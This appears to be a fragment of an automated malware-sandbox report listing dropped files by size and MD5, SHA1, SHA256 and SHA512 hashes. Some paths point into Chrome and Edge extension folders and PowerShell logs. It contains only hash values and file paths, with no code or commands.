SHA512120c9a1190d4ef420c0dbd20248cdd48887e048570247464dc5d28876476ecb6107455a972ac820f2322d4cfc951d41e4d365208760d9bd98567d18ef21484e6
-
Filesize
2KB
MD5afdfe28bb2537cba542bd6f1e12d28aa
SHA1ecbfae574986e2130d2ae6980035c9d1acfdd5f8
SHA256be73acd334bbc06037944aec9b5559b867d38eff0f9291323fc6823fe55e8047
SHA512ab29bc1ca3999694e7c6400855f2fdd68e9e7e649f186b545ba84efa9698242525d5cb1c62dd4db32c57782019565c5b6b65bc4e961431e64d69541fc88ed0c9
-
Filesize
1.1MB
MD5b26dfe732b374c3586457d143b94ae33
SHA1cf21751f66bd93fbed5bc3451f4891191e17a1e4
SHA256b33a1d15d16d7342a4224658432257b4d19b5160fca4cd073a0d3592cfb8941a
SHA5129d188024cc975ec48aeec4234f9614c075157d44f42e9d5a1888f0eed6c241eeb09abc15e42469896ffb483807d9c171ad0563ecc7819539ed35d52b9566a452
-
Filesize
2KB
MD59e206284495b67fa16ff1c328a9d3d60
SHA1583f710902c4c748a474bfc2bb11c5e2bfbfa622
SHA25667a9620b82ad217e08a24b142bb2c737385718ea2fc6711b17345a3efc08ef0b
SHA5122425e5d10b16709dfdcca61d68f31db4232bd05a2de4ef7931d47646416ba0d36b8a938276d40fd18d0f3af24da2237bb00eaa26aff77f39a50749f76e344e24
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
12KB
MD54493b063ac775ef40101f95086e4d5ef
SHA1721a9b80dde39acb367e207c98ae7794d84f15ad
SHA25617ed2c617073e3ad74f682647b511ac036420521f7d27163c4c3da367964fdb4
SHA512cdc7dfcfc3c3f93e02b2a92871ed4a9b037cd346851472779df1aca830dc000587e55e7df1fc6215e6fac3f257038a92abaa81af687c0c1bfc15a207b0829148
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
6KB
MD572b3fd59d0a10a1fa3ae3f976ebe934a
SHA16137481fe5fb432f71e3bea44edd0b3c218efc14
SHA256ec17728ffdee26eb6ecad5ad85346540c2dcc5519168586c86f4b3d7319e7bb6
SHA512fc51e8ae40725c83d7c5b825b7a252da3b6e3e697e285ffed01c0561bc3c6d356ae8e4162db5a0fd4197b054019f56cf40121ab0a491328591a44dc6adcf8e8f
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
6.3MB
MD5260daa3fec9cec2b44e09a0e08b93a21
SHA12cad259d0fd2b05d43f0c932bb70dd2d70817204
SHA256d831a74114d51d3b7fc512dc790516e7771396041be9633d187553cae8fa7ea2
SHA51261114432a2f3eed564110148a96847c4f32e72575ddbbab28f7499acd7ba423b654c974afb0729933984a2ff8668934379ffa3ac2902cf38478b2935a6834870
-
Filesize
6.3MB
MD5260daa3fec9cec2b44e09a0e08b93a21
SHA12cad259d0fd2b05d43f0c932bb70dd2d70817204
SHA256d831a74114d51d3b7fc512dc790516e7771396041be9633d187553cae8fa7ea2
SHA51261114432a2f3eed564110148a96847c4f32e72575ddbbab28f7499acd7ba423b654c974afb0729933984a2ff8668934379ffa3ac2902cf38478b2935a6834870
-
Filesize
6.8MB
MD5482fc087127ddfab79bf97cae6575e36
SHA1d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a
-
Filesize
6.8MB
MD5482fc087127ddfab79bf97cae6575e36
SHA1d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6.8MB
MD5482fc087127ddfab79bf97cae6575e36
SHA1d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a
-
Filesize
6.8MB
MD5482fc087127ddfab79bf97cae6575e36
SHA1d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a
-
Filesize
7KB
MD534a4d5a59ceee044d94f72410e8b688d
SHA11ecea081813b0b432048496e45db0d9da5563576
SHA256cf7476580c4ddc1e883e228ddbf9b840178dbbafe57f4c6209fe74bffba7479e
SHA512a352bd800e1c6197c72004cc5ec2eacf5df022c8f30bca90635fb8442a84fcaa2cfd021eadc43bfb677a201557709d5a65278807215e0d9d894ecd7ee26a7e28
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5ba78170aa424ea1e61848aa573ffcbf4
SHA1d21cc99e8171abd5cfd3d535f083ddb3d85e0415
SHA25680bbbdbac022fbdfe76f39cdfb1cd5a0f2ad216921c2cf3846b41f535c73dfe5
SHA5127840321bfd210a64c5a61ed565852e27f3aad05f8708ad2f620ba30311bdfe5183619264cd1413dafeda6a77d7bda66d7fdcbf07d0eee17d385531434413863f
-
Filesize
6.1MB
MD5bcdad82817cf7040575e753c1146ec87
SHA12c776d0c9d5718f16c0d7d4011e88f3a32b7a6a1
SHA2569d82cfbaf837e98c15cd61438c27a67c696f683cb8c3dc1f4b4a2cad27525f1b
SHA5128e7c3776af0e6625e4a03b2450c866638ae7272cb8d137b3d83069e447b9bfe0ce26fd71f26505d28753a5ac7edf324897d9d3497e8775e96f7dff3fdfa090c6
-
Filesize
6.1MB
MD5bcdad82817cf7040575e753c1146ec87
SHA12c776d0c9d5718f16c0d7d4011e88f3a32b7a6a1
SHA2569d82cfbaf837e98c15cd61438c27a67c696f683cb8c3dc1f4b4a2cad27525f1b
SHA5128e7c3776af0e6625e4a03b2450c866638ae7272cb8d137b3d83069e447b9bfe0ce26fd71f26505d28753a5ac7edf324897d9d3497e8775e96f7dff3fdfa090c6
-
Filesize
6.8MB
MD5482fc087127ddfab79bf97cae6575e36
SHA1d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a
-
Filesize
6.8MB
MD5482fc087127ddfab79bf97cae6575e36
SHA1d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a
-
Filesize
6.8MB
MD5482fc087127ddfab79bf97cae6575e36
SHA1d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a
-
Filesize
6KB
MD56f9484016a36d3f0cd43fa9b2833663f
SHA19f4fece19cd36c33cab6faa25e96e4f2f7c0d0c9
SHA256cc2515b0df3e3b8d712b134b0471db3f05150c47373a2da6af65b24d60b2ce38
SHA51277a7234c0e142921d83c6b14c473853e120693f47d1280e6f547826f9be35f505fd40d0c58e36005569218016eb59f98015f6a92fd0dc014f4f7ded3b9a9c90b
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732